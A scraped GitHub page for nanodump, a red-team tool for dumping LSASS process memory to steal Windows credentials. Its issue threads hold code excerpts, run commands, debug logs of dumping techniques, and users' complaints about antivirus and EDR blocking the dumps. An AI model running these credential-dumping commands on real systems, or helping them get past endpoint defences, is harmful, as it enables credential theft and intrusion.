fortra / nanodump Goto Github PK

View Code? Open in Web Editor NEW

1.6K 31.0 228.0 13.73 MB

The swiss army knife of LSASS dumping

Home Page: https://www.coresecurity.com/core-labs/articles/nanodump-red-team-approach-minidumps

License: Apache License 2.0

C 96.20% Python 0.55% Assembly 3.25%

cna bof lsass cobalt-strike

nanodump's People

Contributors

Stargazers

Watchers

Forkers

0ffgr1d jordanpotti t43wiu6 jxpsx fengjixuchui leftp zhouzu goowen csh0tforks gavz ykankaya majid-derkaoui clavoillotte r4ml1n gamblingmaster2020 agelovito scriptidiot topotam jkm5270 solomonsklash binarytrails atsud0 scareing fancysauced wisdark th3xace johnjohnsp1 superuser5 timb-machine-mirrors rvrsh3ll madusec yyming-sudo jeromeyoung workcha xiaobei97 bharadwajyas c002 grouppppp m00nt0 sry309 nothingcw bravery9 b1gw00d rocker9527 maetderebag 5l1v3r1 haidragon k0uaz raspberryhusky gladiatx0r killvxk 3as0n crackercat uionto xiaoxiaozhu5 ajpc500 toxicnade yukar1z0e dandankasha bl4d3666 ggg4566 v4nyl invokethreatguy minkione thesubtlety sliverarmory yougar0 analyticsearch cyrex562 curtishoughton aliakbarrashidi fcccode justinforbes codingman keystroke95 nusiloot tomkallo tyhk imactrlu langyayue marcosd4h epichoxha 0range-x demon-i386 0xrobert ghost5683 gitlabgit123 nocomp cutff randengshifu listinvest anshumansrivastavagit tehseensagar weiwhy singularidad c0rtado caustickirbyz xiaolan65536 fuzzyun1c0rn kycgni

nanodump's Issues

what is "cool SW2_SEED"

I am more confused about what this means.
"cool SW2_SEED"

tiny correctness bug in snapshot_process()

This is a tiny correctness bug.

The function design of snapshot_process is such that hProcess is always clobbered when calling the function. As such, snapshot_process must always close the handle otherwise it will result in a handle leak of the passed in hProcess.

    // avoid reading LSASS directly by making a snapshot
    if (snapshot_lsass)
    {
        hProcess = snapshot_process(
            hProcess,
            PhSnapshot);
        if (!hProcess)
            goto cleanup;
    }

There are two error paths that could lead to such a leakage. I could not find any circumstance where the first one would manifest in the code as written. The second one would only happen if PssNtCaptureSnapshot could not be resolved dynamically (perhaps only possible on out of support target OSes).

// create a snapshot of the LSASS process
HANDLE snapshot_process(
    IN HANDLE hProcess,
    OUT PHANDLE hSnapshot)
{
    BOOL ret_val = FALSE;
    PssNtCaptureSnapshot_t PssNtCaptureSnapshot;
    PssNtQuerySnapshot_t PssNtQuerySnapshot;
    HANDLE hCloneProcess = NULL;
    DWORD process_flags = 0;
    DWORD thread_flags = 0;
    DWORD error_code = 0;

    if (!hProcess || !hSnapshot)
!        goto cleanup;   <<< hProcess input parameter NOT closed here

    // find the address of PssNtCaptureSnapshot dynamically
    PssNtCaptureSnapshot = (PssNtCaptureSnapshot_t)(ULONG_PTR)get_function_address(
        get_library_address(NTDLL_DLL, TRUE),
        PssNtCaptureSnapshot_SW2_HASH,
        0);
    if (!PssNtCaptureSnapshot)
    {
        api_not_found("PssNtCaptureSnapshot");
!        goto cleanup;   <<< hProcess input parameter NOT closed here
    }

    *hSnapshot    = NULL;
    process_flags = PROCESS_PPSCAPTURESNAPSHOT_PERMISSIONS;
    thread_flags  = THREAD_PPSCAPTURESNAPSHOT_PERMISSIONS;

    error_code = PssNtCaptureSnapshot(
        hSnapshot,
        hProcess,
        process_flags,
        thread_flags);

!    NtClose(hProcess); hProcess = NULL;  <<< hProcess input parameter closed here

A solution would be to always ensure that hProcess is closed on every exit from snapshot_process

https://github.com/helpsystems/nanodump/blob/07e44d2aa2f97cd298b2063fc344999840c8d2a7/source/handle.c#L421

Werfault technique returns empty lsass dump

Hi @S4ntiagoP ,

the werfault technique seems cool and has some potential :)

However, i run it on a Windows 1909 and i got an empty lsass dump:

This is the output of the debug release:

C:\Users\splintercode\Desktop\nanodump-main\dist>nanodump.x64.exe --werfault C:\dmp -p 792
DEBUG: source/utils.c:323:remove_syscall_callback_hook(): The syscall callback hook was set to NULL
DEBUG: source/entry.c:474:main(): Using 792 as the PID of LSASS
DEBUG: source/werfault.c:117:set_registry_keys(): Registry key has been created : \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsass.exe
DEBUG: source/werfault.c:137:set_registry_keys(): Registry key value has been created : GlobalFlag
DEBUG: source/werfault.c:170:set_registry_keys(): Registry key has been created : \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\
DEBUG: source/werfault.c:192:set_registry_keys(): Registry key has been created : \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\lsass.exe
DEBUG: source/werfault.c:229:set_registry_keys(): Sub key LocalDumpFolder has been created
DEBUG: source/werfault.c:246:set_registry_keys(): Sub key DumpType has been created
DEBUG: source/werfault.c:500:rtl_report_silent_process_exit(): LSASS PID: 792, PID: 4508, TID: 10148
DEBUG: source/werfault.c:352:WaitForWerSvc(): The WER is ready
DEBUG: source/werfault.c:455:SendMessageToWERService(): Port handle: 0x000000000000008C
DEBUG: source/werfault.c:472:SendMessageToWERService(): Sent the message to the WER service
Done, to get the secretz run:
python3 -m pypykatz lsa minidump lsass.exe-(PID-792).dmp

Any idea why it's not working?

WIN7 Failed

Target iInformation

Windows 7 Ultimate (x64)

I use the .exe version to run nanodump

then I downloaded the minidump and Recover invalid signatures

I use Kali pypykatz, But it failed

I also try to use Cobalt Strike, then use Kali pypykatz, it failed too

Declare in advance that my Kali pypykatz is OK

Issues when I run with CoffLoader

Hello Team,
I have tried the nano dump with offloader, and I generated the hex value as below. I have tried both fork and snapshot technique

Beacon Argument Generator
Beacon>addint 660
Beacon>addString test.dmp
Beacon>addint 1
Beacon>addint 1
Beacon>addint 0
Beacon>addint 1
Beacon>addint 0
Beacon>addint 1
Beacon>addint 0
Beacon>addint 0
Beacon>addint 0
Beacon>addint 0
Beacon>addString ""
Beacon>addint 0
Beacon>addint 0
Beacon>addint 0
Beacon>addString ""
Beacon>addint 0
Beacon>generate
b'570000009402000009000000746573742e646d700001000000010000000000000001000000000000000100000000000000000000000000000000000000030000002222000000000000000000000000000300000022220000000000'

Then I ran it with COFFLoader.

COFFLoader64.exe go nanodump.x64.o 570000009402000009000000746573742e646d700001000000010000000000000001000000000000000100000000000000000000000000000000000000030000002222000000000000000000000000000300000022220000000000
Got contents of COFF file
Running/Parsing the COFF file
the --malseclogon-leak-local technique failed!Ran/parsed the coff
Outdata Below:

the --malseclogon-leak-local technique failed!

I could not figure it out what the issue could be

Compile Environment?

I'm not saying that Makfile.mingw doesn't work; I'm just curious about how to make Makefile.clang work properly. This might go beyond the scope of the project itself, but I am really curious about it.

make -f Makefile.clang
rm -f dist/*
###### RELEASE ######
clang -target x86_64-w64-windows-gnu source/spoof_callstack.c source/hw_breakpoint.c source/shtinkering.c source/dinvoke.c source/utils.c source/handle.c source/impersonate.c source/modules.c source/syscalls.c source/token_priv.c source/malseclogon.c source/nanodump.c source/werfault.c source/entry.c -o dist/nanodump.x64.exe -Wall -I include -Xclang -DNANO -DEXE -g0
source/nanodump.c:422:11: warning: variable 'number_of_ranges' set but not used [-Wunused-but-set-variable]
    DWORD number_of_ranges = 0;
          ^
1 warning generated.
/usr/bin/ld: cannot find -lgcc: No such file or directory
/usr/bin/ld: cannot find -lgcc_eh: No such file or directory
/usr/bin/ld: cannot find -lgcc: No such file or directory
/usr/bin/ld: cannot find -lgcc_eh: No such file or directory
clang: error: linker command failed with exit code 1 (use -v to see invocation)
make: *** [Makefile.clang:12: nanodump] Error 1



clang -target x86_64-w64-windows-gnu source/spoof_callstack.c source/hw_breakpoint.c source/shtinkering.c source/dinvoke.c source/utils.c source/handle.c source/impersonate.c source/modules.c source/syscalls.c source/token_priv.c source/malseclogon.c source/nanodump.c source/werfault.c source/entry.c -o dist/nanodump.x64.exe -Wall -I include -Xclang -DNANO -DEXE -g0 -v

/.......

End of search list.
 "/usr/bin/ld" -m i386pep -Bdynamic -o dist/nanodump.x64.exe /usr/x86_64-w64-mingw32/lib/crt2.o /usr/x86_64-w64-mingw32/lib/crtbegin.o -L/usr/x86_64-w64-mingw32/lib -L/usr/x86_64-w64-mingw32/mingw/lib -L/usr/lib -L/usr/x86_64-w64-mingw32/sys-root/mingw/lib /tmp/spoof_callstack-3e5e01.o /tmp/hw_breakpoint-8f67b0.o /tmp/shtinkering-0b743d.o /tmp/dinvoke-711304.o /tmp/utils-4758a8.o /tmp/handle-684d22.o /tmp/impersonate-279d84.o /tmp/modules-a153eb.o /tmp/syscalls-32ce70.o /tmp/token_priv-2ea7ed.o /tmp/malseclogon-bbfa28.o /tmp/nanodump-9071b4.o /tmp/werfault-9699fd.o /tmp/entry-964bf4.o -lmingw32 -lgcc -lgcc_eh -lmoldname -lmingwex -lmsvcrt -ladvapi32 -lshell32 -luser32 -lkernel32 -lmingw32 -lgcc -lgcc_eh -lmoldname -lmingwex -lmsvcrt -lkernel32 /usr/x86_64-w64-mingw32/lib/crtend.o
/usr/bin/ld: cannot find -lgcc: No such file or directory
/usr/bin/ld: cannot find -lgcc_eh: No such file or directory
/usr/bin/ld: cannot find -lgcc: No such file or directory
/usr/bin/ld: cannot find -lgcc_eh: No such file or directory
clang: error: linker command failed with exit code 1 (use -v to see invocatio

I noticed that you provide clang in your repository for cross-platform Windows binary compilation. I tried to compile it on my Ubuntu but encountered errors.

I would like to know how you compiled it as I suspect that I might be missing some toolchains and cross-platform libraries. For example, the gcc and gcc_eh cross-platform libraries. I have tried many approaches but still failed to compile successfully. I even tried to replicate this behavior on MSYS2 in Windows, but unfortunately, I still failed.

I realize that I have never understood the cross-platform compilation behavior of clang.

I have been searching for a long time and have not found the correct documentation to solve this question. I realize that clang can provide more help for cross-platform compilation.

I would like to know the answer. Please let me know how you made the Makefile.clang work properly.

Make issue Makefile.mingw source/malseclogon.c

nanodump$ make -f Makefile.mingw
rm -f dist/*
###### RELEASE ######
x86_64-w64-mingw32-gcc source/spoof_callstack.c source/dinvoke.c source/utils.c source/handle.c source/impersonate.c source/modules.c source/syscalls.c source/token_priv.c source/malseclogon.c source/nanodump.c source/werfault.c source/entry.c -o dist/nanodump.x64.exe -masm=intel -Wall -I include -DNANO -DEXE
source/malseclogon.c: In function ‘leak_lsass_handle_in_seclogon_with_race_condition’:
source/malseclogon.c:502:5: error: unknown type name ‘REQUEST_OPLOCK_INPUT_BUFFER’
  502 |     REQUEST_OPLOCK_INPUT_BUFFER inputBuffer = { 0 };
      |     ^~~~~~~~~~~~~~~~~~~~~~~~~~~
source/malseclogon.c:503:5: error: unknown type name ‘REQUEST_OPLOCK_OUTPUT_BUFFER’
  503 |     REQUEST_OPLOCK_OUTPUT_BUFFER outputBuffer = { 0 };
      |     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~
source/malseclogon.c:504:16: error: request for member ‘StructureVersion’ in something not a structure or union
  504 |     inputBuffer.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION;
      |                ^
source/malseclogon.c:504:36: error: ‘REQUEST_OPLOCK_CURRENT_VERSION’ undeclared (first use in this function)
  504 |     inputBuffer.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION;
      |                                    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
source/malseclogon.c:504:36: note: each undeclared identifier is reported only once for each function it appears in
source/malseclogon.c:505:16: error: request for member ‘StructureLength’ in something not a structure or union
  505 |     inputBuffer.StructureLength = sizeof(inputBuffer);
      |                ^
source/malseclogon.c:506:16: error: request for member ‘RequestedOplockLevel’ in something not a structure or union
  506 |     inputBuffer.RequestedOplockLevel = OPLOCK_LEVEL_CACHE_READ | OPLOCK_LEVEL_CACHE_HANDLE;
      |                ^
source/malseclogon.c:506:40: error: ‘OPLOCK_LEVEL_CACHE_READ’ undeclared (first use in this function)
  506 |     inputBuffer.RequestedOplockLevel = OPLOCK_LEVEL_CACHE_READ | OPLOCK_LEVEL_CACHE_HANDLE;
      |                                        ^~~~~~~~~~~~~~~~~~~~~~~
source/malseclogon.c:506:66: error: ‘OPLOCK_LEVEL_CACHE_HANDLE’ undeclared (first use in this function)
  506 |     inputBuffer.RequestedOplockLevel = OPLOCK_LEVEL_CACHE_READ | OPLOCK_LEVEL_CACHE_HANDLE;
      |                                                                  ^~~~~~~~~~~~~~~~~~~~~~~~~
source/malseclogon.c:507:16: error: request for member ‘Flags’ in something not a structure or union
  507 |     inputBuffer.Flags = REQUEST_OPLOCK_INPUT_FLAG_REQUEST;
      |                ^
source/malseclogon.c:507:25: error: ‘REQUEST_OPLOCK_INPUT_FLAG_REQUEST’ undeclared (first use in this function)
  507 |     inputBuffer.Flags = REQUEST_OPLOCK_INPUT_FLAG_REQUEST;
      |                         ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
source/malseclogon.c:508:17: error: request for member ‘StructureVersion’ in something not a structure or union
  508 |     outputBuffer.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION;
      |                 ^
source/malseclogon.c:509:17: error: request for member ‘StructureLength’ in something not a structure or union
  509 |     outputBuffer.StructureLength = sizeof(outputBuffer);
      |                 ^
source/malseclogon.c:565:9: error: ‘FSCTL_REQUEST_OPLOCK’ undeclared (first use in this function); did you mean ‘FSCTL_REQUEST_BATCH_OPLOCK’?
  565 |         FSCTL_REQUEST_OPLOCK,
      |         ^~~~~~~~~~~~~~~~~~~~
      |         FSCTL_REQUEST_BATCH_OPLOCK
make: *** [Makefile.mingw:11: nanodump] Error 1

Text above displayed when fresh download of project is done with make -f Makefile.mingw command is run.

not lucky with BEST

without bitdefender everything works
is there any way to solve this ?

dumpfile parse error

Nano dump file size is only 9M mimikatz and pypykatz cannot be parsed normally . Procdump dumpfile is 35M

can upload sln pro? please

Can upload sln project? vs2015 compile, output many error ...
thanks !

malseclogon_trigger_lock leaks process and thread handles returned from CreateProcessWithTokenW/CreateProcessWithLogonW

These calls to CreateProcessWithTokenW and CreateProcessWithLogonW do not close the process and thread handles returned in the procInfo parameter.

See: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createprocesswithtokenw

Handles in PROCESS_INFORMATION must be closed with the CloseHandle function when they are no longer needed.

            success = CreateProcessWithTokenW(
                handle_list->Handle[i],
                0,
                NULL,
                cmdline,
                0,
                NULL,
                NULL,
                (LPSTARTUPINFOW)&startInfo,
!                &procInfo);   <<< Process and thread handles not closed
            if (success)
            {
                break;
            }
        }
    }
    else
    {
        CreateProcessWithLogonW(
            NANODUMP_USER,
            NANODUMP_DOMAIN,
            NANODUMP_PASSWD,
            LOGON_NETCREDENTIALS_ONLY,
            NULL,
            cmdline,
            0,
            NULL,
            NULL,
            (LPSTARTUPINFOW)&startInfo,
!            &procInfo);   <<< Process and thread handles not closed

https://github.com/helpsystems/nanodump/blob/08dd0da278b1e3d9a9a3ddfc8f5bb7491bd546ad/source/malseclogon.c#L515

Nanodump does not run on Server 2012 R2

Hello team,

I have problems when I run the nanodump.x64.exe directly on a Windows Server 2012 R2 (in a powershell). Unfortunately there is no output or any error message at all. In general it looks like this:

PS C:\users\public> .\n64.exe --write test1.docx
PS C:\users\public>

PS C:\users\public> .\n64.exe --write test2.docx --fork
PS C:\users\public>

PS C:\users\public> .\n64.exe --write test3.docx --snapshot
PS C:\users\public>

Nothing is done or written to the hard disk. Tested the same behavior on multiple Windows Server 2012 R2 with the same result. Have you ever noticed such behavior?

Example system version:

OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600

Thanks in advance for the support and also for the really cool tool :)

source/utils.c(264): error C2065: 'ProcessInstrumentationCallback': undeclared identifier

hello,
getting this error during the compile steps:

C:\temp\nanodump>nmake -f Makefile.msvc

RELEASE

    ML64 /c source/syscalls-asm.asm /link /NODEFAULTLIB /RELEASE /MACHINE:X64

Assembling: source/syscalls-asm.asm
cl.exe -DNANO -DEXE -Zp8 -c -nologo -Gy -Os -O1 -GR- -EHa -Oi -GS- -I include source/dinvoke.c source/utils.c source/handle.c source/modules.c source/syscalls.c source/token_priv.c source/malseclogon.c source/nanodump.c source/entry.c
dinvoke.c
utils.c
source/utils.c(264): error C2065: 'ProcessInstrumentationCallback': undeclared identifier
handle.c
modules.c
syscalls.c
token_priv.c
malseclogon.c
nanodump.c
entry.c
Generating Code...
NMAKE : fatal error U1077: '"C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.29.30133\bin\HostX64\x64\cl.exe"' : return code '0x2'
Stop.

any ideas or i do something wrong ?
thanks

Issues with nanodump in cobalt strike

download [id: -775643611] closed: Missed start message/metadata.

May I know how to solve this? Thanks

Unresolved external in nanodump.x64.o

nanodump.x64.o cannot be used with "friendly" COFF loaders (like Cobalt Strike) due to implementations for get_library_address and get_function_address not being provided. A quick fix for this is provided below, although it imports a decent chunk of code that is unused and is not an ideal solution.

tl;dr - as these functions are built without an implementation, the compiler treats them as external functions. When a COFF loader sees this, it will attempt to resolve an implementation externally, which it can't.

diff --git a/source/entry.c b/source/entry.c
index 323c2af..e37d62e 100644
--- a/source/entry.c
+++ b/source/entry.c
@@ -1,6 +1,8 @@
 #include "entry.h"

 #ifdef BOF
+ #include "syscalls.h"
+ #include "dinvoke.c"
  #include "nanodump.c"
 #else
  #include "nanodump.h"

Promblem DUMP_MAX_SIZE.

del pls my error

sekurlsa::minidump from nanodump output file

i am using nanodump for dumping lsass.exe. everything is ok, but when i get to mimikatz by following command,got error:

mimikatz.exe "sekurlsa::minidump <path/to/dumpfile>" "sekurlsa::logonPasswords full" exit

mimikatz error: ERROR kuhl_m_sekurlsa_acquireLSA ; Memory opening

i use "x64 nanodump ssp dll", and AddSecurityPackage winapi for attaching to lsass

when i was testing all way's, detect that nanodump specified dump file size(default=>report.docx),is different from procmon.exe Full and Mini dump output.

my test:

procmon full = 71 MB ,procmon mini = 1.6 MB

nanodump = 11 MB

fix ppl exploit for Windows server 2012

I tried nanodump_ppl bof, on a Windows server 2012,(lsa has ppl protection) and is fully updated. it doesn't work, any way to fix this?

Get LSASS PID fails

Hi,

I was trying out on multiple systems now, with an elevated prompt and/or a SYSTEM shell. The find_lsass function always returns
The LSASS process was not found. Try providing the PID with -p or --pid

Dumping with manually specifying the ID works fine for me.

I wonder what the problem is here, actually.

Some ideas?

Greetings

NtReadVirtualMemory, error

Environment is Windows 10 + Kaspersky Total Security.

NtReadVirtualMemory, status: 0xc0000022

If you need the environment, here is the download link

https://trial.s.kaspersky-labs.com/registered/vvzkph9ftg3ws2zhfhll/3436353730347c44454c7c32_26155/kts21.3.10.391abzh-Hans_26155.exe

Dumped file but file will not be parsed

INFO:root:Parsing file ../../TEST_1636586596_lsass.dmp INFO:pypykatz:===== BASIC INFO. SUBMIT THIS IF THERE IS AN ISSUE ===== INFO:pypykatz:pypyKatz version: 0.3.7 INFO:pypykatz:CPU arch: X64 INFO:pypykatz:OS: Windows 10 INFO:pypykatz:BuildNumber: 22000 INFO:pypykatz:MajorVersion: 6 INFO:pypykatz:MSV timestamp: 0 INFO:pypykatz:===== BASIC INFO END ===== ERROR:root:Error while parsing file ../../TEST_1636586596_lsass.dmp Traceback (most recent call last): File "/usr/lib/python3/dist-packages/pypykatz/lsadecryptor/cmdhelper.py", line 195, in run mimi = pypykatz.parse_minidump_file(args.memoryfile) File "/usr/lib/python3/dist-packages/pypykatz/pypykatz.py", line 77, in parse_minidump_file raise e File "/usr/lib/python3/dist-packages/pypykatz/pypykatz.py", line 73, in parse_minidump_file mimi.start() File "/usr/lib/python3/dist-packages/pypykatz/pypykatz.py", line 267, in start self.get_logoncreds() File "/usr/lib/python3/dist-packages/pypykatz/pypykatz.py", line 168, in get_logoncreds logoncred_decryptor.start() File "/usr/lib/python3/dist-packages/pypykatz/lsadecryptor/packages/msv/decryptor.py", line 360, in start entry_ptr_value, entry_ptr_loc = self.find_first_entry() File "/usr/lib/python3/dist-packages/pypykatz/lsadecryptor/packages/msv/decryptor.py", line 263, in find_first_entry position = self.find_signature('lsasrv.dll',self.decryptor_template.signature) File "/usr/lib/python3/dist-packages/pypykatz/lsadecryptor/package_commons.py", line 71, in find_signature raise Exception('Signature was not found in module %s Signature: %s' % (module_name, self.decryptor_template.signature.hex())) Exception: Signature was not found in module lsasrv.dll Signature: 33ff4189374c8bf34585c074 Traceback (most recent call last): File "/usr/lib/python3/dist-packages/pypykatz/lsadecryptor/cmdhelper.py", line 195, in run mimi = pypykatz.parse_minidump_file(args.memoryfile) File "/usr/lib/python3/dist-packages/pypykatz/pypykatz.py", line 77, in parse_minidump_file raise e File "/usr/lib/python3/dist-packages/pypykatz/pypykatz.py", line 73, in parse_minidump_file mimi.start() File "/usr/lib/python3/dist-packages/pypykatz/pypykatz.py", line 267, in start self.get_logoncreds() File "/usr/lib/python3/dist-packages/pypykatz/pypykatz.py", line 168, in get_logoncreds logoncred_decryptor.start() File "/usr/lib/python3/dist-packages/pypykatz/lsadecryptor/packages/msv/decryptor.py", line 360, in start entry_ptr_value, entry_ptr_loc = self.find_first_entry() File "/usr/lib/python3/dist-packages/pypykatz/lsadecryptor/packages/msv/decryptor.py", line 263, in find_first_entry position = self.find_signature('lsasrv.dll',self.decryptor_template.signature) File "/usr/lib/python3/dist-packages/pypykatz/lsadecryptor/package_commons.py", line 71, in find_signature raise Exception('Signature was not found in module %s Signature: %s' % (module_name, self.decryptor_template.signature.hex())) Exception: Signature was not found in module lsasrv.dll Signature: 33ff4189374c8bf34585c074

It was dumped fine but it could not be parsed either from mimikatz or pypykatz.

Compile Environment?

Can you share what your compile toolchain looks like?

kali@kali:~/tools/nanodump$ x86_64-w64-mingw32-gcc -v
Using built-in specs.
COLLECT_GCC=x86_64-w64-mingw32-gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-w64-mingw32/10-win32/lto-wrapper
Target: x86_64-w64-mingw32
Configured with: ../../src/configure --build=x86_64-linux-gnu --prefix=/usr --includedir='/usr/include' --mandir='/usr/share/man' --infodir='/usr/share/info' --sysconfdir=/etc --localstatedir=/var --disable-option-checking --disable-silent-rules --libdir='/usr/lib/x86_64-linux-gnu' --libexecdir='/usr/lib/x86_64-linux-gnu' --disable-maintainer-mode --disable-dependency-tracking --prefix=/usr --enable-shared --enable-static --disable-multilib --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --libdir=/usr/lib --enable-libstdcxx-time=yes --with-tune=generic --with-headers=/usr/x86_64-w64-mingw32/include --enable-version-specific-runtime-libs --enable-fully-dynamic-string --enable-libgomp --enable-languages=c,c++,fortran,objc,obj-c++,ada --enable-lto --enable-threads=win32 --program-suffix=-win32 --program-prefix=x86_64-w64-mingw32- --target=x86_64-w64-mingw32 --with-as=/usr/bin/x86_64-w64-mingw32-as --with-ld=/usr/bin/x86_64-w64-mingw32-ld --enable-libatomic --enable-libstdcxx-filesystem-ts=yes --enable-dependency-tracking
Thread model: win32
Supported LTO compression algorithms: zlib
gcc version 10-win32 20210110 (GCC)

The problem: I'm working on loading this via Invoke-ReflectivePEInjection.ps1 and am re-compiling it to not require command line arguments. The provided compiled EXE loads and works great, however, when re-compiling with the GCC version shown above i'm getting DEP and ASLR errors. That's totally not a "you" problem, but I figured comparing toolchain versions would be a good first troubleshooting step.

What Can I do if there is DUMP_MAX_SIZE warnning?

No error handling with append() for large dumps, corrupted data returned

Hey, really appreciate the project.

On systems where there's large memory dumps (>DUMP_MAX_SIZE), you get the "dump is too big" errors produced by append() as expected (line ~30 in nanodump.c). However, it doesn't set any state to indicate an error has occurred.

This means you could end up with a load of the dump size errors, and then when it's time to send the data back, it still does (resulting in a lot data being exfiltrated), but it's obviously corrupted as it's not all there so you can't analyse it.

Maybe issue with nanodump -write

REF issue on other repo skelsec/pypykatz#101

I have run into this when using tool.

Let me know what/if any feedback is needed.

restore_signature.sh was run without error on file.

1 Beacon did basically DOS shell with The dump file is too big. please increase DUMP_MAX_SIZE. this occurred on 1 of 2 tests.

LSASS process not found

I'm using the same exe on the same cloned VM, first one works, second one has an EDR and I get this:

>whoami /all
...
SeDebugPrivilege                Debug programs                            Disabled

>tasklist
...
lsass.exe                      728 Services                   0     16,536 K

>nanodump.x64.exe -w dump
The LSASS process was not found. Are you elevated?

I'm guessing the EDR is doing something, but it has detected nothing, any idea?

p.s. the VM is obviously isolated from internet/cloud